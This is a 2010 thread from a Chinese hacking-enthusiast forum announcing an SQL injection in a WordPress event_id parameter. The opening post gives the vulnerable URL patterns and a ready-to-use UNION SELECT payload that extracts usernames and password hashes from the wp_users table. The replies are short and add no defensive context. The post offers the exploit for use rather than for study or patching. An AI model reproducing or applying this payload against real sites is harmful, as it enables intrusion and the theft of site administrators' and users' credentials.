标题:
WordPress最新event_id注入漏洞
[打印本页]
作者:
柔肠寸断
时间:
2010-2-7 10:58
标题:
WordPress最新event_id注入漏洞
===[ Exploit ]===
www.WordPress.com/?event_id=[Sql]
www.WordPress.com/Path/?event_id=[Sql]
Exploit:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
作者:
海豚
时间:
2010-2-7 14:31
1#
柔肠寸断
师傅能这个漏洞吗
作者:
baiyin
时间:
2010-2-8 10:57
http://www.venustech.com.cn/NewsInfo/124/5957.Html
作者:
hyrz
时间:
2010-2-14 13:21
这样的站点都能注入,汗!
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2